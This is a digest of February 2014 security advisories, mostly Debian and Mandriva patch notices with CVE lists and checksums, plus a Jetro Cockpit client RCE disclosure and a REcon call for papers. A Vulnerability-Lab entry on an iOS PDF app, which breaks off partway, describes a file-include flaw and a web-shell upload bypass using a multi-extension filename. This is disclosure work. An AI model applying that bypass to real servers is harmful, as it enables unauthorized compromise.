-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2862-1 secur...@debian.org http://www.debian.org/security/ Michael Gilbert February 16, 2014 http://www.debian.org/security/faq - - Package: chromium-browser Vulnerability : several CVE ID : CVE-2013-6641 CVE-2013-6643 CVE-2013-6644 CVE-2013-6645 CVE-2013-6646 CVE-2013-6649 CVE-2013-6650 Several vulnerabilities have been discovered in the chromium web browser. CVE-2013-6641 Atte Kettunen discovered a use-after-free issue in Blink/Webkit form elements. CVE-2013-6643 Joao Lucas Melo Brasio discovered a Google account information disclosure issue related to the one-click sign-on feature. CVE-2013-6644 The chrome development team discovered and fixed multiple issues with potential security impact. CVE-2013-6645 Khalil Zhani discovered a use-after-free issue related to speech input. CVE-2013-6646 Colin Payne discovered a use-after-free issue in the web workers implementation. CVE-2013-6649 Atte Kettunen discovered a use-after-free issue in the Blink/Webkit SVG implementation. CVE-2013-6650 Christian Holler discovered a memory corruption in the v8 javascript library. For the stable distribution (wheezy), these problems have been fixed in version 32.0.1700.123-1~deb7u1. For the testing distribution (jessie), these problems will be fixed soon. For the unstable distribution (sid), these problems have been fixed in version 32.0.1700.123-1. We recommend that you upgrade your chromium-browser packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQQcBAEBCgAGBQJTAPwuAAoJELjWss0C1vRzHu0f/i51htbha+JCafx87gIm1vU/ z2cLhHDzWEKk47Bhl8Y0BJzl5lMCwAxmBfKaHLLz2/UQvNY4Eva1Jsj0o297KX1z qHl32L0yAblue5n+iWmccx9/vZ2d0Bj0/tYk8LGZ2W4IzzqhNbRsV2Grq14mA6N0 ne9EMmsJenir8tQBk1GD8yFA4QWStzIxGt0Mmvtt8EdE7Vwk6cBb5wProY9aFwCX hsui4ysoZL6kZdmlN/hrrZmtA8j7Vnq8v/sgAKZgvXY/b0tBjWQOGyDdDBEECtk7 Y991Zg8IhQCBwt1euICFVKGkdAwq/6mlJAxKJEnzlvj9hw3TiWTFFSkk3fqQJkT1 T/aDoWrGUsPc0iDYo0GrFsJejLvD3jznQiWLU21b+j8GYS6gJoZJDbv8VCwoCHCn rG+NiRoI9p1DwTWTOSs3h3ypp8On77CC0w3VsNErVv0+GMxQteo+2W85R2AxhdWH B5RnDfxS/J6DG6dlkkjf3mkUxbT2VidT0TZMDFtqKwREiyEaXRMuUm9BmIIixO2W nJybfpYJVKmlDsJjmMq6+1jUL1nXAm8AtbWEHS/yHapqlykOSjA2zt4UqOSaOVwz x5ZiWB5aVf13atISUTJsv6tSZ3OnBjUzW0wHM4D+cw8DMjC9ruoqpoy3hsToCBvi CesvjFirPNQnQQmltaNvek6lT9b1C8W5lm3IQhj9jiylAPF15Lenfk1YrxTMQ6cd EI6mRCDCeF1gq1lRopVJkbY0AuHWRHHQpwgiyuAznY+E3iKSksAVVZVfcoO70jxY q6Ht3lXT5g6tF5GbGE1gZAZn6rm5M3I8fRkBq/7hiKV77ex8g8EdtgvDzN0Jipea VGL/yQo5/Bn2h+600tWurExSKNlbvUkoTL2/ORJDl79J3n6C8XSGG9I3IpAw/ncx u26fOfxuQGw/y18QkCvW+J3s8i8v3sdn2NjDI/rS0djUGN4KTZRMFajvthYf1IJg KhbO/d5D+iZGqNC+B5S8RnDj91xW/tL4KG3hcYlrfRH6o4F1BSeh7q/kQDpnZSNt z6jXGl1bnPlACRDTDWSNTci2NnlVIj6qIB8V5Lf9BAEDHgQS/Gvv+hVwqJZqIiKC gdpWEdhZEw4ExsFT8oOUqINbXIG68YujeUwC5gBXStA5YZbnJBMuVU05BOB/3Gsp zX7W0IEUxaTrDmKqNLNilZ5soBl63Dei4hOOnsnVvBDfuO6HEJNd/kVzB5nV4yYZ 0tujnudHHdfHFVhonzrbUu75Ryk9Y36Md0+cp2n51na2BK2ljdOUUab5x3xbFTQo PsuIbyJJIrRt+t0cu4S7X47ajZMH/cpQLJTZO0jCeWIOvlX00EyXXtDhLa+sPkA= =yzUa -END PGP SIGNATURE-
Jetro Cockpit Secure Browsing vulnerability - Client missing input validation allowing RCE
CVE-2014-1861 Affected versions: 4.3.3 4.3.1 and probably prior versions. Jetro Cockpit Secure Browsing makes use of a client running on a user's workstation in the enterprise's internal network, and a server in the DMZ that connects on the client's behalf to the internet. Attack scenario: User causes server to be compromised by an unpatched or 0-day vulnerability. For example, a browser exploit, or a PDF viewer exploit. The product should provide network separation and sand-box such an attack. However the vulnerability found allows a compromised server to execute code on the client machine using the printing mechanism. Specifically: - If an attacker gains user-level RCE on the server, the found issue will allow RCE on the same user's workstation in the internal network. - If an attacker gains elevated privileged RCE on the server (using a PE vulnerability), the found issue will allow RCE on any user's workstation in the internal network. The client does not validate input coming from the server as a result of a print-to-pdf event. The server can send an .EXE file instead of the expected .PDF file and the client will execute the file upon receiving it. Full disclosure, demo and details here: http://blog.quaji.com/2014/02/remote-code-execution-on-all-enterprise.html Ronen Zilberman
My PDF Creator DE DM v1.4 iOS - Multiple Vulnerabilities
Document Title: === My PDF Creator DE DM v1.4 iOS - Multiple Vulnerabilities References (Source): http://www.vulnerability-lab.com/get_content.php?id=1201 Release Date: = 2014-02-16 Vulnerability Laboratory ID (VL-ID): 1201 Common Vulnerability Scoring System: 7.3 Product Service Introduction: === My PDF Doc is the all-in-one document management solution for iPhone, iPod touch and iPad. It can catch documents from PC or Mac via USB cable or WIFI, email attachments, Dropbox and box and save it on your iPhone, iPod Touch or iPad locally. Cool app that allow you to create PDF from Map, Website and any other text files. My PDF Doc supports PDF, MS Office, iWorks and the most common file types. (Copy of the Vendor Homepage: https://itunes.apple.com/us/app/my-pdf-creator-document-editor/id725481535 ) Abstract Advisory Information: == The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official My PDF Creator Document Editor (Document Manager) v1.4 iOS mobile web-application. Vulnerability Disclosure Timeline: == 2014-02-16: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): Apple AppStore Product: My PDF Creator Document Editor (Document Manager) - iOS 1.4 Exploitation Technique: === Remote Severity Level: === High Technical Details Description: 1.1 A local file include- and an arbitrary file upload vulnerability has been discovered in the official My PDF Creator Document Editor (Document Manager) v1.4 iOS mobile web-application. The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise the web-application/device. The vulnerability is located in the upload file submit module of the mobile web-application interface. Remote attackers can manipulate the `upload submit` POST method request with the vulnerable `filename` value to compromise the application or connected device components. The issue allows remote attackers to include local app path values or wifi web-server files. The exploitation appears on the application-side and the inject request method is POST. The exection occurs in the main index file dir list or in the selected sub category folder/path. The security risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 7.3(+)|(-)7.4. Exploitation of the vulnerability requires no user interaction or privileged mobile application user account. Successful exploitation of the file include web vulnerability results in mobile application compromise, connected device compromise or web-server compromise. Request Method(s): [+] POST Vulnerable Module(s): [+] Upload File Vulnerable Procedure(s): [+] Submit Vulnerable Parameter(s): [+] filename Affected Module(s): [+] File Dir Index Listing (http://localhost:50496) [+] Sub Category (Path) Listing (http://localhost:50496/.xpath) 1.2 An arbitrary file upload web vulnerability has been discovered in the official My PDF Creator Document Editor (Document Manager) v1.4 iOS mobile web-application. The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation. As result the attacker is mostly able to execute the uploaded malicious file. The vulnerability is located in the upload file module with the submit procedure. Remote attackers are able to upload a php or js web-shells by a rename of the file with multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension `image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg . gif file extension and can access the application with elevated access rights. The security risk of the arbitrary file upload web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.7(-). Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privileged mobile application user account with password. Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells. Request Method(s): [+] [POST]
[ MDVSA-2014:035 ] libpng
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2014:035 http://www.mandriva.com/en/support/security/ ___ Package : libpng Date: February 17, 2014 Affected: Business Server 1.0, Enterprise Server 5.0 ___ Problem Description: Updated libpng and libpng12 packages fix security vulnerability: The png_do_expand_palette function in libpng before 1.6.8 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a PLTE chunk of zero bytes or a NULL palette, related to pngrtran.c and pngset.c (CVE-2013-6954). ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6954 http://advisories.mageia.org/MGASA-2014-0075.html ___ Updated Packages: Mandriva Enterprise Server 5: 9e459a55c761870ca6b40a12b3d36d66 mes5/i586/libpng3-1.2.31-2.8mdvmes5.2.i586.rpm de27e436523a787cee10ad4318b3c6dd mes5/i586/libpng-devel-1.2.31-2.8mdvmes5.2.i586.rpm dfae88ae67434fb8d6926d747895dae8 mes5/i586/libpng-source-1.2.31-2.8mdvmes5.2.i586.rpm 3b3d03da06f07f56075853827a2dacdb mes5/i586/libpng-static-devel-1.2.31-2.8mdvmes5.2.i586.rpm 4a2f827b292cdc03f63566eae8c812cd mes5/SRPMS/libpng-1.2.31-2.8mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 3fe33312ba78608e46f63cda12b110db mes5/x86_64/lib64png3-1.2.31-2.8mdvmes5.2.x86_64.rpm 90fa95818ad0d287ef9555edef4a882a mes5/x86_64/lib64png-devel-1.2.31-2.8mdvmes5.2.x86_64.rpm 6b7626467754aed28ca5f77904451567 mes5/x86_64/lib64png-static-devel-1.2.31-2.8mdvmes5.2.x86_64.rpm dd60b577dd6e9ce8b934e25ca4e546c8 mes5/x86_64/libpng-source-1.2.31-2.8mdvmes5.2.x86_64.rpm 4a2f827b292cdc03f63566eae8c812cd mes5/SRPMS/libpng-1.2.31-2.8mdvmes5.2.src.rpm Mandriva Business Server 1/X86_64: 9237e9d4b379d48a06c8cef5f6153549 mbs1/x86_64/lib64png12_0-1.2.49-2.1.mbs1.x86_64.rpm dc285e45a37d56f3846eb390a861f4db mbs1/x86_64/lib64png12-devel-1.2.49-2.1.mbs1.x86_64.rpm df04f10a3f6444219d39ab0dae2dc5eb mbs1/x86_64/lib64png15_15-1.5.10-2.1.mbs1.x86_64.rpm d47b514f7851a4bcfad6b5e63e6b6454 mbs1/x86_64/lib64png-devel-1.5.10-2.1.mbs1.x86_64.rpm fda6b6933c420961f4cdaf8a7d82e986 mbs1/SRPMS/libpng12-1.2.49-2.1.mbs1.src.rpm 03558969532f7161705ef96cef74b019 mbs1/SRPMS/libpng-1.5.10-2.1.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFTAd0ymqjQ0CJFipgRAvVZAKCFN8Mi8xxQmTF9tqO+IJKcYFYk4wCgluTx yzTHgzcGw5oVSkHvJLImowk= =uhOm -END PGP SIGNATURE-
[ MDVSA-2014:036 ] varnish
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2014:036 http://www.mandriva.com/en/support/security/ ___ Package : varnish Date: February 17, 2014 Affected: Business Server 1.0 ___ Problem Description: Updated varnish packages fix security vulnerabilities: Varnish before 3.0.5 allows remote attackers to cause a denial of service (child-process crash and temporary caching outage) via a GET request with trailing whitespace characters and no URI (CVE-2013-4484). Also, the services have been converted from SysV init scripts to systemd-native services, which should allow for more consistent behavior. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4484 http://advisories.mageia.org/MGASA-2014-0065.html ___ Updated Packages: Mandriva Business Server 1/X86_64: 6000b9509f578e6ea82e6d3b1644b4f2 mbs1/x86_64/lib64varnish1-3.0.3-0.2.mbs1.x86_64.rpm 815b13bbbdab794e2b93dc4506424d6c mbs1/x86_64/lib64varnish-devel-3.0.3-0.2.mbs1.x86_64.rpm 56decba0182e274354a9abb7b18432e6 mbs1/x86_64/varnish-3.0.3-0.2.mbs1.x86_64.rpm 677e6e2ed82db3e64b6ed07bf03258e3 mbs1/SRPMS/varnish-3.0.3-0.2.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFTAhKOmqjQ0CJFipgRAujTAKCGmfMzeDx9PxP7MKyrc9PFB6METwCeMxTj ctxFW9n8yI8AifPeqA0JVrY= =VqTb -END PGP SIGNATURE-
Recon 2014 Call For Papers - June 27-29, 2014 - Montreal, Quebec
CHRISTMAS ISLANDS PATENT APPLICATION20142329 RECON 2014 February 17th, 2014 BACKGROUND [FIELD OF INVENTION] - REcon 2014 is a computer security conference for reverse engineers, hackers, and enthusiasts. - This patent lays claim to all security conferences and gatherings of hackers where 50% or more of the attendance consists of reverse engineers. [DESCRIPTION OF RELATED ART] - Presently there are many awesome security conferences, but REcon is the only one we know of that is dedicated to reverse engineering. Reversing is our jam. - Numerous other security conferences exist that are worthy of props. Our conference refines the art with a strong focus on the topic of reverse engineering and features highly technical talks. ++ + + + + + + + \ / + _- _+_ - ,__ _=..:. /=\ _|===|_ ||::| | |_|.| | | | | | __===_ -=- ||::| |==| | | __|.:.| /\| |:. | || | .|| : |||::| | |- |.:|_|. :__ |.: |--|==| | .| |_ | ' |. ||. |||:.| __|. | |_|. | |.|...||---| |==| | | | |_--. || |||. | | | | |. | | |::.||: .| |==| | . : |=|===|:|| . ||| .| |:.| .| | | | |:.:|| . | |==| | |=|===| . |' | | | | | | | |' : . | ; ;'| ' : ` : '. ' . . : ' . . `.. ' . [FIG. 1] SUMMARY REcon is a computer security conference with a focus on reverse engineering and advanced exploitation techniques. It is held annually in Montreal, Canada. The conference offers a single track of presentations over the span of three days along with technical training sessions held before the presentation dates. Technical training varies in length between two and four days. REcon 2014 is almost here and we have another great line up of trainings and shenanigans. This year we feel the need to patent our unique brand of awesome before someone else tries to take it away from us. DETAILED DESCRIPTION REcon is an event defined by our attendees, speakers, and trainers. The attendees have always been, and will always be, those looking to learn something new, share ideas, and unwind in a welcoming environment. The trainers are the best in their fields. This year we are bringing together a great set of trainings. - Reversing telecom platforms for security: applied hacking on legacy monolithic MSC and HLR to modular ATCA's reversing by Philipe Langlois (2 days: 25-26 June) - Introduction to USB Emulation with the Facedancer by Travis Goodspeed and Sergey Bratus (2 days: 25-26 June) - The Exploit Laboratory: Red Team by Saumil Shah (2 days: 23-24 June) - The Exploit Laboratory: Master by Saumil Shah (2 days: 25-26 June) - Reverse Engineering Malware by Nicolas Brulez (4 days: 23-26 June) - iOS 7 Kernel Exploitation Training by Stefan Esser (4 days: 23-26 June) - Keep It Synple Stupid - Utilizing Programmable Logic for Hardware Reverse-Engineering by Dmitry Nedospasov and Thorsten Schroeder (4 days: 23-26 June) - Windows Internals for Reverse Engineers by Alex Ionescu (4 days: 23-26 June) The speakers define the conference and we invite you to submit for this year's REcon CFP. The conference features a single track of talks. Some guidelines for talks are: - 30 to 60 minute presentations, or longer, we are flexible - We are open to proposals for workshops that would occur alongside talks - Trainings of 2, 3 or 4 days focused on reversing and/or exploitation - There will be time for five to ten minute informal lightning talks during the REcon party The conference talks in the following fields are encouraged: - Hardware reverse engineering - Software reverse engineering - Protocol reverse engineering - Finding vulnerabilities and writing exploits - Novel data visualization for hackers and reverse engineers - Bypassing security and software protections - Attacks on cryptography in hardware and software - Techniques for any of the above on new or interesting architectures - Wireless hacking (We aren't talking about wifi here) ++ Anything else elite ++ The more description you provide, the more you are able to claim as your invention.
[ MDVSA-2014:037 ] ffmpeg
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2014:037 http://www.mandriva.com/en/support/security/ ___ Package : ffmpeg Date: February 17, 2014 Affected: Business Server 1.0, Enterprise Server 5.0 ___ Problem Description: Updated ffmpeg packages fix security vulnerabilities: This updates provides ffmpeg version 0.5.13 and 0.10.11, which fixes several unspecified security vulnerabilities and other bugs which were corrected upstream. ___ References: http://www.ffmpeg.org/security.html http://git.videolan.org/?p=ffmpeg.git;a=log;h=n0.5.13 http://git.videolan.org/?p=ffmpeg.git;a=log;h=n0.10.11 http://advisories.mageia.org/MGASA-2014-0065.html ___ Updated Packages: Mandriva Enterprise Server 5: 7742b0588624f60c376be19b4d89a8fd mes5/i586/ffmpeg-0.5.13-0.1mdvmes5.2.i586.rpm c14a0eb8817bae066df5373687b5d0d6 mes5/i586/libavformats52-0.5.13-0.1mdvmes5.2.i586.rpm 9ecf8648a04938937a8faea452f6d497 mes5/i586/libavutil49-0.5.13-0.1mdvmes5.2.i586.rpm c458420fb9e790aa41d8abf748692c2e mes5/i586/libffmpeg52-0.5.13-0.1mdvmes5.2.i586.rpm eced4907f2997e3f4ca5d1dee2b62016 mes5/i586/libffmpeg-devel-0.5.13-0.1mdvmes5.2.i586.rpm 72bb5e239cafa24058549dea4bdc8f49 mes5/i586/libffmpeg-static-devel-0.5.13-0.1mdvmes5.2.i586.rpm 7ecee41b7b2815b0823a8658ca06 mes5/i586/libpostproc51-0.5.13-0.1mdvmes5.2.i586.rpm 12d20764ba57fbf71ee9654a4eb64d3f mes5/i586/libswscaler0-0.5.13-0.1mdvmes5.2.i586.rpm 6e96bd5abc38a8a8f58a196af556f806 mes5/SRPMS/ffmpeg-0.5.13-0.1mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 1624df142a467f3a3de4955dd810a1ce mes5/x86_64/ffmpeg-0.5.13-0.1mdvmes5.2.x86_64.rpm d60b7b155f3ae1f90232ecd32ab5d391 mes5/x86_64/lib64avformats52-0.5.13-0.1mdvmes5.2.x86_64.rpm 595dab63bbec115366304d565b86aeb1 mes5/x86_64/lib64avutil49-0.5.13-0.1mdvmes5.2.x86_64.rpm adabce9fedc7086f039626437b7a8004 mes5/x86_64/lib64ffmpeg52-0.5.13-0.1mdvmes5.2.x86_64.rpm 1816cb6946b0f3548c0c424858c51340 mes5/x86_64/lib64ffmpeg-devel-0.5.13-0.1mdvmes5.2.x86_64.rpm 9466173717a6bb74ac05aff1baf255a8 mes5/x86_64/lib64ffmpeg-static-devel-0.5.13-0.1mdvmes5.2.x86_64.rpm b6eb83c3ee6aebf979475f85bffde920 mes5/x86_64/lib64postproc51-0.5.13-0.1mdvmes5.2.x86_64.rpm 52fbf256d72995e157a1cbacf70a4218 mes5/x86_64/lib64swscaler0-0.5.13-0.1mdvmes5.2.x86_64.rpm 6e96bd5abc38a8a8f58a196af556f806 mes5/SRPMS/ffmpeg-0.5.13-0.1mdvmes5.2.src.rpm Mandriva Business Server 1/X86_64: 9264f9935448582010c136761e90550c mbs1/x86_64/ffmpeg-0.10.11-1.mbs1.x86_64.rpm ff6207bacb56aac2f6a298c2bde79b33 mbs1/x86_64/lib64avcodec53-0.10.11-1.mbs1.x86_64.rpm 3b9202057b4f48eb3d3c4a7041af79ae mbs1/x86_64/lib64avfilter2-0.10.11-1.mbs1.x86_64.rpm 02eb33c9845ffd1bb85f01689e5f7831 mbs1/x86_64/lib64avformat53-0.10.11-1.mbs1.x86_64.rpm 63ef87449b5f5941b503fed7b81444f6 mbs1/x86_64/lib64avutil51-0.10.11-1.mbs1.x86_64.rpm 9adeeb722da49ad90998df4070f284e0 mbs1/x86_64/lib64ffmpeg-devel-0.10.11-1.mbs1.x86_64.rpm cd2e95670c3f87abca0601de3f89e53b mbs1/x86_64/lib64ffmpeg-static-devel-0.10.11-1.mbs1.x86_64.rpm 339ee84802d8662336596cbac58eee43 mbs1/x86_64/lib64postproc52-0.10.11-1.mbs1.x86_64.rpm 98ee40b039272a3e2fc8b13c59c530ff mbs1/x86_64/lib64swresample0-0.10.11-1.mbs1.x86_64.rpm beaa3a178f877b0b2122ec8f24261448 mbs1/x86_64/lib64swscaler2-0.10.11-1.mbs1.x86_64.rpm a0c84e846e09588c4194ec665745b984 mbs1/SRPMS/ffmpeg-0.10.11-1.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFTAh1DmqjQ0CJFipgRAsDrAJ0WKhyBoo611fOC5M8yN9qqcPD3rACeJ7jz m+V0nwlGpKVgBHjhe1cjYdk= =xoRs -END PGP SIGNATURE-
[ MDVSA-2014:038 ] kernel
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2014:038 http://www.mandriva.com/en/support/security/ ___ Package : kernel Date: February 17, 2014 Affected: Business Server 1.0 ___ Problem Description: Multiple vulnerabilities has been found and corrected in the Linux kernel: The compat_sys_recvmmsg function in net/compat.c in the Linux kernel before 3.13.2, when CONFIG_X86_X32 is enabled, allows local users to gain privileges via a recvmmsg system call with a crafted timeout pointer parameter (CVE-2014-0038). The restore_fpu_checking function in arch/x86/include/asm/fpu-internal.h in the Linux kernel before 3.12.8 on the AMD K7 and K8 platforms does not clear pending exceptions before proceeding to an EMMS instruction, which allows local users to cause a denial of service (task kill) or possibly gain privileges via a crafted application (CVE-2014-1438). The yam_ioctl function in drivers/net/hamradio/yam.c in the Linux kernel before 3.12.8 does not initialize a certain structure member, which allows local users to obtain sensitive information from kernel memory by leveraging the CAP_NET_ADMIN capability for an SIOCYAMGCFG ioctl call (CVE-2014-1446). The updated packages provides a solution for these security issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0038 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1438 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1446 ___ Updated Packages: Mandriva Business Server 1/X86_64: d1faf9544075ff4790e29edd6e7061f6 mbs1/x86_64/cpupower-3.4.80-1.1.mbs1.x86_64.rpm 3498721d639bf646ed55e2903ce728e4 mbs1/x86_64/kernel-firmware-3.4.80-1.1.mbs1.noarch.rpm f9927f4b1512a26d874a82a99636fb09 mbs1/x86_64/kernel-firmware-3.4.80-1.1.mbs1.src.rpm e874467839b96e04bebd0c5b24f31fc3 mbs1/x86_64/kernel-headers-3.4.80-1.1.mbs1.src.rpm 208f74225f3d18189a871ac308c8df5b mbs1/x86_64/kernel-headers-3.4.80-1.1.mbs1.x86_64.rpm e1f82c2b50db46cdb4db2daa933f7173 mbs1/x86_64/kernel-server-3.4.80-1.1.mbs1.x86_64.rpm ed0d8eed6c61553e73121117bcfc978f mbs1/x86_64/kernel-server-devel-3.4.80-1.1.mbs1.x86_64.rpm 00ca38d2289182149e8f43c6871711e8 mbs1/x86_64/kernel-source-3.4.80-1.mbs1.noarch.rpm 429b6e48ee63a03a83577a710bc5368d mbs1/x86_64/lib64cpupower0-3.4.80-1.1.mbs1.x86_64.rpm a6e3898905be2a8d7ded39a5312f7670 mbs1/x86_64/lib64cpupower-devel-3.4.80-1.1.mbs1.x86_64.rpm 086bc3e49adec4147aa1138ae5d5245c mbs1/x86_64/perf-3.4.80-1.1.mbs1.x86_64.rpm f5a65feb515d65f9f1f526f6294af2c3 mbs1/SRPMS/cpupower-3.4.80-1.1.mbs1.src.rpm 56fafb86f60233b29fcd8d42d35e4678 mbs1/SRPMS/kernel-server-3.4.80-1.1.mbs1.src.rpm 715647161acd9ec082c0a2fef0f35fc3 mbs1/SRPMS/kernel-source-3.4.80-1.mbs1.src.rpm cc72e360fa32823a575d1c9536fdecc3 mbs1/SRPMS/perf-3.4.80-1.1.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFTAiBGmqjQ0CJFipgRAiryAKCz6vqRlzaZ+l0B6QyuMb95i8UVoACgjAGx F7TlfjN081P00FfeKN47Je4= =osPP -END PGP SIGNATURE-